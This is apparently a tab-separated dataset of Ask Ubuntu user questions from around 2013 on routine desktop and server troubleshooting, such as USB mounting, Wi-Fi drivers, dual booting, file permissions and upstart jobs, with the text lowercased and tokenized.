297766	how do i mount my android phone ?	i 'm puzzled because my phone used to just appear when i plugged it in . it does n't anymore and the development options are definitely set to allow usb debugging . the phone is charging via usb but does n't appear in lsusb [ 0 amanda @ luna android-sdk-linux_86 ] $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 17ef:4807 lenovo uvc camera bus 003 device 012 : id 413c:1003 dell computer corp . keyboard hub bus 003 device 003 : id 08ff:2810 authentec , inc. aes2810 bus 003 device 013 : id 413c:2010 dell computer corp . keyboard bus 003 device 014 : id 046d : c001 logitech , inc. n48/m-bb48 [ firstmouse plus ] adb devices -l shows nothing . in my wireless and network settings i changed the usb connection settings to `` mass storage '' -- they were set to `` ask on connection '' though i definitely was n't getting asked . i do n't get any click here to connect via usb alert either . i 'm not even sure whether the issue is my phone or my computer . it seems odd that it is n't even appearing in lsusb not for nothing , the thumb drive on my keyring also does not appear in lsusb -- i 've tried both in a bunch of different ports . i kind of assume the thumb drive is just borked , but it could be my os .
297770	software updater showing updates for removed applications	recently , software updater ( 13.04 ) showed updates for adobe reader . because i did n't need the application anymore , i did n't download the updates and uninstalled it ( through ubuntu software center ) . however , the updates are still showing up in the updater ( after more than a week or so ) . is there a way to remove them ?
297773	is there a way to use firefox favicons with alt-tab ?	at work , i tend to have multiple instances of firefox open at once -- one for outlook web app , one for jira , another one or two for some in-house web apps ... on top of this , i will often have a few terminals ( tmux helps keep this to a minimum ) . i am very habituated to use alt-tab to switch between applications . the problem that i have is that when i 'm switching using alt-tab , all instances of firefox use the firefox icon , so i ca n't tell at a glance which firefox i 'm switching to ... yes , there 's some text there , but i do n't want to stop and read while i 'm flipping through icons . is there a way for alt-tab to display the favicon ( the icon that shows to the left of the url in a web browser ) of the page rather than the firefox icon ?
297776	nexio touchscreen 12.04	i am trying to get working touchscreen nexio nop 190 ir in ubuntu 12.04 . i ca n't find any useful information . here is dmesg : [ 230.521547 ] usb 4-1 : usb disconnect , device number 2 [ 241.167717 ] usb 4-1 : new full-speed usb device number 3 using uhci_hcd [ 241.360406 ] usb 4-1 : new usb device found , idvendor=1870 , idproduct=0001 [ 241.360413 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 241.360419 ] usb 4-1 : product : nexio blk multi-touch nib 190 ( 19 '' ) [ 241.360425 ] usb 4-1 : manufacturer : nexio touch device ( bk ) [ 241.363810 ] cdc_acm 4-1:1.0 : this device can not do calls on its own . it is not a modem . [ 241.363858 ] cdc_acm 4-1:1.0 : ttyacm0 : usb acm device could anybody help me , please ?
297779	command fails to execute in upstart session job	this command : mongod -- fork -- dbpath ../data -- smallfiles -- logpath ../data/mongo.log runs perfectly from terminal , while in directory /mongo/bin/ but , when i use same command and directory for upstart session job file ( at $ home/.config/upstart ) : # mongod_service - mongodb job file description `` mongodb service '' author `` admin '' # when to start the service start on runlevel [ 2345 ] # when to stop the service stop on runlevel [ 016 ] # automatically restart process if crashed # respawn # essentially lets upstart know the process will detach itself to the background expect fork # working directory chdir /mongo/bin/ # log this job console log # start mongod as daemon exec /mongo/bin/mongod -- fork -- dbpath /mongo/data -- smallfiles -- logpath /mongo/data/mongo.log update : changed job file and it starts fine now , but when i try to stop it with initctl stop mongod-service , the command never completes ! . can anyone suggest how to make this work ?
297780	how to download ubuntu keyboard layout ?	is there any way to download keyboard layouts available in ubuntu so i can use them on windows ? i would like to be able to use the same layouts on both os , i especially enjoy default esperano layout and additional arrows in `` regular '' languages . it will be nice if the method was a faster one than creating ( by coping ) a new layout in windows `` keyboard layout creator '' but also not very complicated .
297782	ca n't change keyboard shortcuts in gnome-session-fallback ubuntu 13.04 over xdp	i 'm trying to use gnome-session-fallback on an ubuntu pc running an xrdp+vnc server ( so that i can remotely connect to ubuntu using a windows rdp client ) . the problem i have is that the “d” key seems to be bound to the action “hide all normal windows” , even when i am using a program that captures text . this is a bit annoying because everytime i would press “d” i need to copy and paste a “d” character instead . i went into “system settings” > “keyboard” > “shortcuts” and found that the action was bound to “alt+super+d” . i tried binding the action to another key sequence , but ( as expected ) it did n't fix my problem . at first i assumed this was because the setting i changed is for unity and not for gnome fallback , but if i just log in normally using gnome fallback “d” does not minimise all windows – it just works normally . i also tried connecting directly to the vncserver , from my localhost and got the same behaviour . i get the same behaviour regardless of whether i use a windows , or ubuntu based client . the instructions i used for setting up my ubuntu xrdp+vnc server are here : http : //www.unixmen.com/install-xrdp-in-ubuntu-13-04/ does anyone know why this is happening ? is there any further information that i can provide ?
297794	how to install lubuntu on aspire one running ubuntu 10.4	i have an old aspire one netbook i want to resuscitate . it currently runs ubuntu 10.4 but tells me to go away if i try the update function ( only wants to do a partial update - adobe flash-player has an issue ) decided to kill ubuntu and load lubuntu . easier said than done -i 've been trying for about a week of nights now and i am about to through the thing off a cliff ! my issues are : no cd drive - has to make bootable flashdisk . unetbootin does not run if i download it . ( there are some obscure comments about running some script in the terminal window to make it run , but i tried and can not figure it out ) tried making a bootable flasdisk with startup disk creator , but this just hangs if i try to boot from it . millions of pages of how-to 's but most dating back many years , so relevance is unknown new to linux and not enjoying the experience . seems like running ubuntu is like building your own race car - it can go like stink , but only if you know what you do . think i want a good old simple toyota !
297800	graphic interface does n't start	i came back to work after a week away and this is what greets me : if i press enter it displays the tty1 login prompt . i have booted using a 12.04.2 live usb and it seems to work fine , i`m using it to write this . i have no idea where to start or what to look for . there are no usb devices attached , besides mouse and keyboard . the same message shows up if i disconnect both and reboot . either selecting a `` previous linux version '' on grub , or apt-get dist upgrade does n't solve my issue . here 's the content of xorg . *.log files in /var/log : https : //gist.github.com/anonymous/5613488
297805	how can i block a user from internet access ?	i want my daughter to have free use of the computer under her own user account , but never to have access to the internet . how do i set that up ? i can only really use ubuntu as a windows user - i have no expertise at all .
297806	how do i change the location in the terminal with a custom string ?	if i have a really long path to a folder , and i just want the string 'longlocation ' to replace it in the terminal , i know i can edit the .bashrc file and add this command : alias changelc='export ps1= '' longlocation '' ' this will make the path be replaced by the string 'longlocation ' whenever i enter the command 'changelc ' in the terminal . now what i want is , if i enter the command 'changelc homefolder ' then the long path be replaced by the string 'homefolder ' , or in general , any string that follows 'changelc ' . how do i achieve this ?
297810	ibus not respond in 12.04	12.04.2 workstation where i am using ibus to write in pinyin . recently it has stopped responding . if i select the ibus keyboard icon from the menu , i get presented with the menu list of no input window and i can not quit , restart or click on preferences . i was able to temporarily get this working again by deleting my $ home and setting it up from scratch but shortly after it stops responding once again . i configure it from settings â install / remove languages and install chinese pinyin . i also enable it from command line with im-switch -s ibus would anyone have any experience with this problem or have suggestions for where i can look to troubleshoot .
297814	what does amd mean in the name of an ubuntu iso image download ?	i have an intel 64 architecture and want to download ubuntu 13.04 . the image downloaded has amd in its name . does that mean it is an amd architecture iso image ? is it also compatible with the intel architectures ?
297816	screen shots taken in ubuntu are not opening in windows 8	i have dual boot windows 8 and ubuntu 13.04 . screen shots taken in ubuntu with printscreen do not work inside windows 8 . i ca n't even open them with paint , windows photo viewer , photos , photoshop or with any other software . edit : problem solved after renaming the screen shots in ubuntu to something smaller like 1.png etc possible reasons of error are : 1 ) by default , screen capture in ubuntu give long name to screen shots e.g . `` screenshot at 2013-05-20 00:46:45 '' 2 ) long names are not supported in windows 8 so windows 8 ca n't open png files with that type of names
297820	vnc grey screen after upgrade to ubuntu 13.04	the grey screen on a remote vnc session had been succesfully fixed for my 12.10 version by editing the .vnc/xstartup file as in the 12.04 related discussion in this forum . after an upgrade to ubuntu 13.04 recommended by the updater , i 've got the grey screen back on the vnc clients . gnome-classic is installed and the xstartup has not changed . what else did ubuntu 13 upgrader do wrong ?
297822	ca n't detect my wifi network ubuntu 13.04	i recently installed ubuntu 13.04 32bit on my imac ( 21 inch ) . i can see some networks , both wep and wpa , but not mine and some others . mine is on channel 13 , i think is that the problem . i 've tried the solutions indicated here for similar problems creating an 'options ' file in /etc/modprobe.d and insert the line 'options cfg80211 ieee80211_regdom '' eu '' ' ( tried also with the line 'cfg80211 ieee80211_regdom '' eu '' ' , because i find both indicated as the good ones in forum ) . i also tried to connect using 'connect to a hide network ' but not work . everithing stay the same . i have no access to the router so ca n't change the channel and i have no others network so the imac can not connect to the web . the only support i had is another mac wich using the network that i ca n't use on the imac ( so the network is absolutely not the problem : d ) . what can i do ? ( before reinstalling snow leopard xd ) here are some details : : ~ $ dmesg | grep cfg80211 [ 15.539410 ] cfg80211 : calling crda to update world regulatory domain [ 16.088032 ] cfg80211 : world regulatory domain updated : [ 16.088036 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 16.088039 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.088042 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.088044 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.088047 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.088049 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16.676062 ] info @ wl_cfg80211_attach : registered cfg80211 phy and > ~ $ sudo iwlist wlan0 channel > no frequency information . and the driver : broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( open source ) sorry for the long silence , here are some additional informations you asked me couple of months ago : : ~ $ sudo iwlist eth1 channel eth1 32 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz channel 14 : 2.484 ghz channel 32 : 5.16 ghz channel 34 : 5.17 ghz channel 36 : 5.18 ghz channel 38 : 5.19 ghz channel 40 : 5.2 ghz channel 42 : 5.21 ghz channel 44 : 5.22 ghz channel 46 : 5.23 ghz channel 48 : 5.24 ghz channel 50 : 5.25 ghz channel 52 : 5.26 ghz channel 54 : 5.27 ghz channel 56 : 5.28 ghz channel 58 : 5.29 ghz channel 60 : 5.3 ghz channel 62 : 5.31 ghz channel 64 : 5.32 ghz channel 66 : 5.33 ghz and i put 'options cfg80211 ieee80211_regdom=fr ' ( without the tickmarks ) in a file named 'options ' that i create in /etc/modprobe.d/ everithing stay the same exept that i use the other mac to share the internet connection via ethernet so i have now internet on this problematic mac . thanks for the help , michele
297825	how to boot into windows 8 from grub ?	i just did a 50gb partition on my laptop thaty initially had windows 8 on it , every time i try booting windows im getting an `` invalid efi file path '' i just ran a boot repair and it gave me this url : http : //paste.ubuntu.com/5684049/ if anyone knows how to help me out id really appreciate it !
297826	brightness settings not working , stuck on zero brightness	i just recently installed ubuntu on my computer , so a i am a little new at using this os . it seems to work fine and run smoothly other than my brightness settings are not working , beyond using the key board fn keys , the actual brightness and lock settings have no effect on the brightness . the brightness seems to almost be turned off , its very hard to see anything and i have no idea what to do , any help would be very appreciated . i am running ubuntu 13.04 on an acer aspire 5336 and my system details are : intel celeron ( r ) cpu 900 @ 2.20 ghz , graphics card ; intel gm express chipset 64 bit with 250 gb hard drive .
297831	why does my deja dup restore run out of space ?	i back up my `` home ( myname ) '' folder weekly using deja dup to an external hard drive . the external hd is 320 gb . my computer is 160gb , with partition 1=winre 13gb ( sda1 ) partition 2=win7 52gb ( sda2 ) extended partion 3=ubuntu 89gb ( sda3 ) free = 6gb ( sda4 ) : ep3 ( sda3 ) has 3 partitions : sda5 ( swap 2gb ) , sda6 ( data 61gb ) , sda7 ( filesystem 26gb ) after a crash i tried to restore using deja dup , but the restore was only partial because i got a free space warning . when i looked at what happened i found that my `` /home '' folder was full ( only 200mb left ) , and the partition ( sda7 ) was also full . since i only backed up the `` home ( myname ) '' folder , and i ticked 'restore to original location ' when doing the restore a ) how can the restore be bigger than than where it came from ? b ) why has this happened ? c ) what can i do to untangle the situation ?
297833	how do i prevent automatic mounting of my android phone in 13.04 ?	gvfs is mounting my phone automatically when i plug it in , i do n't want this for various reasons . how do i disable automatic mounting for this specific device , but continue allowing other usb devices to automount ? here 's the mount after plugging in : ~ $ gvfs-mount -l drive ( 0 ) : st320lt007-9zv142 type : gproxydrive ( gproxyvolumemonitorudisks2 ) drive ( 1 ) : hl-dt-st dvd+/-rw gu60n type : gproxydrive ( gproxyvolumemonitorudisks2 ) drive ( 2 ) : generic ultra hs-sd/mmc type : gproxydrive ( gproxyvolumemonitorudisks2 ) volume ( 0 ) : galaxy nexus type : gproxyvolume ( gproxyvolumemonitormtp ) mount ( 0 ) : galaxy nexus - > mtp : // [ usb:002,020 ] / type : gproxyshadowmount ( gproxyvolumemonitormtp ) mount ( 0 ) : mtp - > mtp : // [ usb:002,020 ] / type : gdaemonmount update tue may 21 00:03:00 edt 2013 : i found /usr/share/gvfs/mounts/mtp.mount which contains : [ mount ] type=mtp exec=/usr/lib/gvfs/gvfsd-mtp automount=false unhappily this automount parameter does n't seem to do anything . in the meantime i 've followed advice from here and disabled automount-open and automount in the gconf settings under org.gnome.desktop.media-handling . this disables it globally but it 's better than the alternative . here 's hoping we 'll have device- or protocol-specific ( or both ! ) gvfs automount configuration in the future .
297837	stdout log files from an executable	when starting an executable from the terminal various messages are printed in window . my question is where are these messages logged when you launch the application without a terminal ( by double clicking on the icon ) i looked in /var/log but i do n't know in which file they are printed out . for example an custom application that is started from the unity launcher
297839	i start upgrade and download only part of the packages	i start upgrade and download only 1366 packages out of 19.. how to restart remaining packages for downloading ?
297840	access to ubuntu server 12.04 with ubuntu workstation 12.04	i recently installed ubuntu server 12.04 . i gave the server a static ip address . i now installed ubuntu 12.04 on a workstation . i can connect to it via the terminal but i can not add any folders to the server . when i connect via ssh with the correct creditenals and static ip address , it gives me the following message : error while creating directory folder . there was an error creating the directory in sftp : // ( name ) . the permission status is : permission denied . i would like to know how i can give full-editing access to the workstation user ( different static ip address ) so they can edit the server files . thank you .
297841	can not set the resolution manually	i use ubuntu 13.04 and i have a 23-inch lcd and max resolution i can get is 1024ă768 i am trying to set resolution to 1280ă720 . i wrote : cvt 1280 720 60 then xrandr -- newmode 1280x720 74.50 1280 1344 1472 1664 720 723 728 748 -hsync +vsync then xrandr -- addmode vga-0 1280x720 then xrandr -- output vga-0 -- mode 1280x720 http : //webconverger.org/display/ and it works but when restart or shutdown this message appears : click on the image to open a full-resolution version . then i deleted config/monitors.xml cp ~/.config/monitors.xml monitors.xml.bad rm ~/.config/monitors.xml and the message disappeared . i tried all these steps several times and i faced the same problem .
297842	i have problem with uefi and legacy usb boot options in my computer.. , with these i ca n't install ubuntu 12.x and 13.04 versions on my laptop	i am using samsung laptop with amd-64 type processor.. , meanwhile i have problem with this , my laptop have uefi and usb legacy support in my bios settings.. , with that i am unable to install ubuntu 12.x series and as well as 13.04 also both 32 and 64 bit.. , but i tried to installing 11.10 and it was successfully installed.. , i need to install 13.04 in my laptop.. , and i was alredy read an article in this forum about uefi and legacy boot but those are not understandable , so please any one help me in a simple way.. ,
297845	how do i install filezilla ?	i 'm using 13.04 i go to ubuntu software center and find filezilla but there is no button to install . i try to find it in ubuntu start button at application or ubuntu dash how its called and click download the button and nothing happens . then i tried to install via terminal with sudo but the instructions do n't work those i found for ubuntu 12 .
297846	ubuntu 13.04 hangs on reboot ( shutdown works fine )	i have ubuntu 13.04 on a lenovo thinkpad sl510 . since upgrading to 13.04 , the computer hangs on the ubuntu loading screen ( the changing white and orange dots ) when rebooting . turning on and off however works fine .
297848	dual booting ubuntu without affecting recovery disk	i bought a new laptop with genuine windows 8 with a recovery partition built in . i need to install ubuntu without affecting to the current configurations . this is how my partition table looks in windows . how should i free up memory to install ubuntu ? there are two recovery partitions . one with 500mb and the other with 8.34 gb . what is the purpose of two of them ?
297852	control mplayer with slave mode , key_down_event problem	i 'm trying to control mplayer through the slave mode with a fifo , some commands as echo `` pt_step 1 '' > > fifo echo `` quit '' > > fifo echo `` pause '' > > fifo echo `` set_property volume 60 '' > fifo work perfectly but the key_down_event doesn't echo `` key_down_event down '' > > fifo echo `` key_down_event up '' > > fifo echo `` key_down_event < - '' > > fifo echo `` key_down_event - > '' > > fifo any idea of what i 'm doing wrong ? thanks
297856	mount rsnapshot directory via nfs for non-root access	i 'm trying to make my rsnapshot-backups available to non-root users on a ubuntu server . there is a step-by-step instruction in the rsnapshot howto , which i think i 've followed to the letter . the howto tells me to create the directories /.private/.snapshots/ ( backup folder ) and /.snapshots/ ( mount point ) . in /etc/exports , add /.private/.snapshots/ as a read only nfs export : /.private/.snapshots/ 127.0.0.1 ( ro , no_root_squash ) in /etc/fstab , mount /.private/.snapshots/ read-only under /.snapshots/ localhost : /.private/.snapshots/ /.snapshots/ nfs ro 0 0 however , when i issue the command : mount /.snapshots/ i get this error message : mount.nfs : access denied by server while mounting localhost : /.private/.snapshots/ the package nfs-kernel-server is installed and i restarted it after editing /etc/exports . what did i miss ?
297857	ubuntu 13.04 do n't boot with windows 7	so i just installed the gnome , i used the gparted to make the partitions because the basic mode to install side by side with windows was not working . ok , i made the partitions and installed , no problem . but the dual boot it 's not working , runs directly the windows 7 . the bios setup i also ca n't config the 2nd boot with the ubuntu partition , only shows the first one and de dvd drive . my motherboard it 's a gigabyte mini . i tried to found here someone that had the same problem but no results . anyone can help ? thanks !
297859	how can i get a list of users that have logged in via ssh ?	i would like to audit how often users log into my ubuntu system remotely . how can i get a list of users that have logged in via ssh for a particular period of time ? ( for example , the last 24 hours ? )
297860	i hear sound from microphone through built laptop speakers in 13.04 . how to turn off ?	i hear my echo from speakers . if i say something its looping and resonate . how to turn microfone sound output off ? we do n't have hardware tab at sound settings in 13.04
297861	thinking of switching to linux , a few questions..	im wanting to switch from windows for a while without having to upgrade to windows 7/8 but i wanted to know if what i want to do is supported.. im currently using a gigabyte g41m-es2l and intel e6500 with a radeon hd5450 ( connected via hdmi to my tv ) i am in the process of buying a esata raid tower and does it support esata hotswap ? will i still be able to use my hdmi connection with sound ? does it support hard drives over 3tb and raid over 8tb ?
297865	where has the .themes folder gone ?	i 'm now running 13.04 and wanted to install some of my favourite themes , but found that the folder .themes was just missing . does it work to just make the folder ?
297869	missing vmlinuz and initrd.img in 13.04	i am attempting to set up a new macbook pro as dual boot osx mountain lion/ubuntu 13.04 , using refind as the boot manager , and the most recent 64-bit mac image from here . according to all the tutorials i have been able to find , i need to copy over the vmlinuz and initrd files to a place that refind can see them in order to actaully boot into ubuntu after installing it . however , these files do not appear to exist in my install , as the following are broken links : /vmlinuz - > /boot/vmlinuz-3.8.0-19-generic /initrd.img - > /boot initrd.img-3.8.0-19-generic where can i find/download these files ? or has something changed between the 13.04 daily builds that i can find tutorials for and the actual release version ?
297874	which dock station delivering power + external monitor would work with 13.04 ?	as mentioned in many other posts , usb 3.0-dock stations ( with displaylink3000 ) do not work with linux and i seem to understand there is no hope to have it working soon . i have myself a new dell xps13 with ubuntu 13.04 . i would like to know which dock station i could use which would work flawlessly with ubuntu : i need that dock station to provide power and link to an external monitor ( dvi ) , just through the mini display port or a usb . thanks so much for any tip here ! [ bought 2 usb 3.0 superspeed dell dock stations thinking this was supported by displaylink , one for home , one for the office ... but failed to do anything with these and my xps13 ]
297881	how to resolve dependency conflict ( perl conflicts with libxml-sax-perl ) ?	i am trying to install a package called libxml-simple-perl , but it depends on libxml-sax-perl , i have installed other dependencies without issues , but this one below is giving me a lot of trouble , and i do n't know how to solve it : dpkg : regarding libxml-sax-perl_0.99+dfsg-1_all.deb containing libxml-sax-perl : perl conflicts with libxml-sax-perl ( < < 0.99+dfsg-1ubuntu0.1 ) libxml-sax-perl ( version 0.99+dfsg-1 ) is to be installed . dpkg : error processing libxml-sax-perl_0.99+dfsg-1_all.deb ( -- install ) : conflicting packages - not installing libxml-sax-perl errors were encountered while processing : libxml-sax-perl_0.99+dfsg-1_all.deb what i ca n't understand is what the conflict is , it just says perl conflicts with libxml-sax-perl . how do i solve this ?
297886	why ca n't i set group and ownership of one folder without afffecting the other ?	i 've upgraded an ubuntu pc from 10.04 to 12.04 . problem is all the permissions were wrong on the home folders . so , i did the following : sudo chown -r james : james /home/james/* sudo chown -r james : james /home/james/ . * sudo chown -r htpc : htpc /home/htpc/* sudo chown -r htpc : htpc /home/htpc/ . * but you end up with all the files in both folders either in james : james or htpc : htpc , depending on which way round you run the commands . how have the become linked and how can i fix it ? as requested : james @ htpc : ~ $ ls -l /home total 8 drwxr-xr-x 41 james james 4096 may 20 19:32 htpc drwxr-xr-x 31 james james 4096 may 20 20:04 james james @ htpc : ~ $ ls -l /home/htpc total 236 drwxr-xr-x 4 james james 4096 nov 25 13:19 desktop drwxr-xr-x 2 james james 4096 mar 13 2011 documents drwxr-xr-x 5 james james 4096 dec 22 2010 downloads -rw-r -- r -- 1 james james 179 nov 18 2010 examples.desktop -rwxr-xr-x 1 james james 85 dec 27 2010 goback -rw-r -- r -- 1 james james 425 nov 28 2010 modelines drwxr-xr-x 5 james james 4096 dec 27 2010 music drwxr-xr-x 22 james james 4096 oct 29 2012 pictures drwxr-xr-x 2 james james 4096 nov 18 2010 public drwxr-xr-x 2 james james 4096 nov 18 2010 templates -rwxr-xr-x 1 james james 251 dec 27 2010 testmode drwxr-xr-x 2 james james 4096 dec 23 2010 videos -rwxr-xr-x 1 james james 190672 nov 6 2010 winetricks james @ htpc : ~ $
297889	130.4 is very slow and killing my internet connection	i have 3 computers at home : 2 laptops and 1 desktop . i have an internet connection of 20mb down and 3 mb up . after i installed ubuntu 13.04 ( clean install , wiped the hd ) on a desktop and a laptop , i see something weird : the systems are very slow ( comparing to 12.10 ) the biggest problem : they are taking all my bandwidth ( without any application open ) . it comes down to ~3 mb down and ~0.5 mb up . if i turn the systems , the bandwidth is ok . i do n't see these problems on my work laptop ( 12.04 with gnome-classic ) , and did n't had them before upgrading from 12.10 to 13.04 . any idea what is happening ? some details : the laptop is doal core with 4g of ram the desktop if quad core with 8g of ram the router id d-link . edit : i see the connection problem on the 13.04 mchines and on the 12.04 mchine ( and on my android phone ) the system is slow in opening browser ( firefox ) , opening folders ( nautilus ) and in general .
297892	new computer installation problems	i 've just bought a new desktop computer : gigabyte 970a-ds3 nvidia geforce gtx 650 amd fx8350 ram : 16 gb i 'd like to install 13.04 64-bit , but when i try to install , mouse does n't work at all ( ps2 , usb and wireless ) . the same on 12.04 64-bit however , on 12.04 32-bit it works fine . my question is : what version should i intall ? if i install 32-bit will i be able to use full ram and full capacities ? is it better for me to wait until 13.10 64-bit ? ... thanks
297899	how can i stop back in time from using up all my inodes ?	i started using back in time about a month ago and have it set to back up my `` work '' folder hourly . all went fine , until today when ( after quite a bit of wtf on my part ) i found that it had eaten up all my inodes . i had bit set to use up to 2gb of space and keep backups for a year . it still had plenty of space but it had eaten up all the inodes on that partition . i do n't see any options in bit 's configuration that are related to inodes . how should i prevent this from happening in the future ?
297907	ubuntu installation in bios mode	i want to know what kind of installation is the best for me . i bought my computer with windows 7 preinstalled in it and i upgraded it to windows 8 . it is in bios mode and i saw that i need to install ubuntu the same , in bios and i saw that ubuntu in bios is the classic installation , but what is the classic installation of ubuntu ? thanks ubuntu user
297912	which ultrabook , will work fully with newer versions of ubuntu ?	which ultrabook/brand should i take to expect it to be the most compatible with the new versions of ubuntu ? i am considering buying an ultrabook transformer ( pc/tablet , such as sony tablet duo , dell xps 12 , asus taichi or the like ) , and would like it to work under ubuntu . i have looked at various threads , such as : can ubuntu run on windows 8 tablet pcs ? ubuntu resolution with ultrabook and found full compatibility of such devices ( with some exceptions , such as dell xps 13 ) has not been achieved . i have heard that newer versions of ubuntu , announced by canonical for versions 13.10 and/or 14.04 , will be on tablets : http : //techcrunch.com/2013/02/19/canonical-unveils-ubuntu-for-tablets-developer-preview-available-for-download-on-thursday/
297918	different pictures for items	on my desktop i have alot of different shell files that run a game . i want to replace those ugly shell file looks on your desktop and replace it with the game 's logo . is there a way to do this ?
297919	java hibernate : download mysql or lamp	i am going to be writing a spring based java application and i was wondering if i should install mysql directly or should i just install lamp . i would like to install lamp , but would this have any side effects with jdbc ? thanks .
297920	installing vmware-tools for windows guest	i have downloaded the required file vmware-tools-windows-9.2.3-1031769.x86_64.component.tar but i do n't understand how to install it . it untars to vmware-tools-windows-9.2.3-1031769.x86_64.component and descriptor.xml.how do i install a .component file ? the host is raring ringtail and the guest is windows 8 in vmware player . also under the ubuntu environment
297921	why ca n't i open anything i download from the internet ?	every time i try to download a program , it goes straight to archive manager . i donât know what to use in order to open anything i download . what should i do ?
297925	ubuntu connect the internt from anywhere ?	just a question i might ask you something . i 'm heading off on a vacation soon , so all in honest , as a new ubuntu user , i have never connected the internet anywhere else besides home . so would i be able to access the internet anywhere else ? if yes , do i have to check the wireless network to do so ?
297931	1up industries 's bins-like for unity launcher ?	i 'm curious if there is an application for ubuntu that allows for the type of functionality given by bins ( link here ) . would like to group ides and web browsers in a similar fashion . edit : i 'm not looking for the app drawer of android . if anything , more like the folders on the home screen for android just contained within the unity launcher . so i could click or mouseover the `` folder , '' and i 'd see a small group of icons ( ie hover over development `` folder '' and see webstorm , sublime text , eclipse , etc . ) i 'm thinking that drawers answer may be in line with what i 'm looking for ( not concerned with text vs icons ) . will test when i get home and mark as answer if so .
297934	attempting to create live usb stick to try 13.04 on laptop with ati radeon hd 4225 graphics	my laptop is a dell m101z with amd athlon ii neo k125 processor . graphics are ati mobility radeon hd4225 . i have created a live usb stick of 13.04 using the appropriate amd64 iso image . the stick boots as far as the 'do you wish to try or install ' screen , but then the screen remains dark and the install fails as it is unable to find the appropriate graphics driver . so the question is , how do i create a usb stick with the appropriate graphics driver in order to be able to try out ubuntu 13.04 ? i know there are many q & as related to this , but i ca n't see one which specifically relates to the usb stick option . i 'm new to this , so simple ( and ideally win7 based as i have n't got ubuntu yet ) answers please . sincere thanks for your help .
297936	gedit not working for some users	i am using gedit 3.8.2 on ubuntu 13.04 raring ringtail with gnome 3.8 . i have two user accounts on my computer . when i launch gedit in my account , i get a window that is blank , and am not able to create or open any files . the terminal output shows : ( gedit:16768 ) : glib-gobject-warning ** : can not register existing type `gtksourceview'` ( gedit:16768 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( gedit:16768 ) : glib-gobject-critical ** : g_type_get_qdata : assertion `node ! = null ' failed ( gedit:16768 ) : glib-gobject-critical ** : g_type_get_qdata : assertion `node ! = null ' failed ( gedit:16768 ) : glib-gobject-critical ** : g_type_set_qdata : assertion `node ! = null ' failed ( gedit:16768 ) : glib-gobject-warning ** : can not register existing type `gtksourcebuffer' ( gedit:16768 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed ( gedit:16768 ) : glib-gobject-critical ** : g_type_get_qdata : assertion `node ! = null ' failed ( gedit:16768 ) : glib-gobject-critical ** : g_type_get_qdata : assertion `node ! = null ' failed ( gedit:16768 ) : glib-gobject-critical ** : g_type_set_qdata : assertion `node ! = null ' failed ( gedit:16768 ) : glib-gobject-warning ** : can not register existing type `gtksourcelanguage' ( gedit:16768 ) : glib-critical ** : g_once_init_leave : assertion `result ! = 0 ' failed in any other account or as root , gedit works normally . please help !
297938	error compiling with make	when i tried to compile john the ripper on my computer a dell inspiron 1501 running 13.04 i ran the command make make clean generic i get the error /usr/bin/ld : can not find -lssl /usr/bin/ld : can not find -lcrypto /usr/bin/ld : can not find -lz collect2 : error : ld returned 1 exit status make : *** [ generic.h ] error 1 how do i fix this
297940	ubuntu 13.04 not recognized as bootable after installation	i managed to successfully install ubuntu 13.04 ; however after restarting , i found that the installation was unbootable.there was no error message -- there was simply no option to boot from my hard drive . after the failure i sucessfully reinstalled 12.04 which worked just fine.the 13.04 beta release and 12.10 have also installed successfully in the past , but 13.04 final just completely fails to boot at all . i have a modern computer with uefi boot capabilities ( can switch from bios to uefi ) .ubuntu 12.10 will only load correctly in uefi mode , if that helps diagnose the issue . i am also installing using a basic dvd , no flash drives . so that should rule out any issue there . whatever it is something that changed between the beta release and the final version have rendered my computer useless . my specs are the following ( from invoice ) 1x sager np9150 / clevo p150em display : 15.6 '' fhd 16:9 `` matte type '' super clear ultra bright led anti-glare sager screen w/ 95 % ntsc color gamut ( 1920x1080 ) ( sku - s1x301 ) processor : sager - 3rd generation intel® ivy bridge core™ i7-3840qm ( 2.8ghz - 3.8ghz , 8mb intel® smart cache , 45w max tdp ) ( sku - s2r203 ) thermal compound : -stock oem thermal compound graphics video card : nvidia geforce gtx 670mx 3,072mb pci-express gddr5 dx11 with optimus™ technology [ user upgradeable ] ( sku – s3r517 ) copper cooling upgrade : no copper cooling upgrade external display video adapters : no video adapter external mobile display : no external mobile display ram : 32gb - ddr3 1600mhz dual channel memory ( 4 sodimms ) ( windows 7 pro os required ) ( sku - s4t844p ) msata ssd drive ( slot 1 ) : no msata ssd primary hard drive : 512gb crucial m4 series solid state drive [ ssd2 serial-ata iii ] ( sku – s5r063 ) optical drive bay : combo dual layer supermulti dvdrw/cdrw drive w/ software ( when selecting a hard drive in the optical bay , no optical drive is included ) ( sku - s7r455 ) optical drive bay hard drive caddy : sager - optical bay hard drive 